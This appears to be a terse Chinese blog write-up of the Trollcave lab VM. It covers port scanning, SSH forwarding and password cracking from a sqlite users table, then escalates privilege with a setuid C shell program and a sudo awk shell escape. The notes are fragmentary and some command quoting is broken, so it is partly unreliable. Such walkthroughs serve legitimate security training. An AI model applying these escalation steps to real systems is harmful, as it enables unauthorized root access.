Trollcave-suid提权
2024-09-01 01:01:05
一 扫描端口
扫描开放端口:nmap -sV -sC -p- 192.168.0.149 -oA trollcave-allports
扫描敏感目录:gobuster dir -u http://192.168.0.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
二 信息收集
netstat -lntp 查看端口信息
ssh -L 8888:localhost:8888 端口转发
通过setuid
来提权
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc,char *argv[])
{setreuid(1000,1000);//etc/passwd
execve("/bin/sh",NULL,NULL);
}
base64 exp [空格]
让所有用户都可以使用。
chmod 4755
5432是postsql的端口号
sqlite select * from users; 密码是可进行破解的,运行出来全是明文,可以直接去碰撞的
enter+shift+~+大写C 进行ssh
sudo -l 查看当前权限
/etc/sudoers 去掉
awk 可以执行系统命令 sudo awk'{system('/bin/bash')}''
最新文章
- HttpClient在HTTP协议接口测试中的使用
- 【代码笔记】iOS-通过颜色来生成一个纯色图片
- Python 开平方
- include指令和include标签的区别
- HTML5和css3的总结四
- 13年省赛-B题-连通分量
- iOS 全局竖屏 单个viewcontroller点击按钮支持横屏
- form 表单练习
- [开源]在iOS上实现Android风格的控件Toast
- .net 实战 根据configuration选项生成不同的config文件
- scrapy爬取数据进行数据库存储和本地存储
- NewLife.Net——开始网络编程
- github ignore 规范
- BM递推
- QT学习之第一个程序
- Tensorflow(二)
- UVA-818 Cutting Chains (位压缩+暴力搜索)
- UITableView分页
- Proxy account failing to run SSIS Error (Proxy (11) is not allowed for subsystem ";SSIS"; and user ";AB\testuser ";.
- Machine Learning笔记整理 ------ (一)基本概念
热门文章
- 精尽Spring MVC源码分析 - HandlerAdapter 组件(二)之 ServletInvocableHandlerMethod
- windows 10 1909 无法启用 .NET Framework 解决
- beautiful soup 遇到class标签的值中含有空格的处理
- 使用php进行微信小程序图片安全验证
- 附028.Kubernetes_v1.20.0高可用部署架构二
- Windows系统/office安装与激活
- 解决WebStorme点击谷歌浏览器图标无反应问题
- [转载]Mybatis Generator最完整配置详解
- BPF的可移植性和CO-RE (Compile Once – Run Everywhere)
- jQuery 库中的 $() 是什么?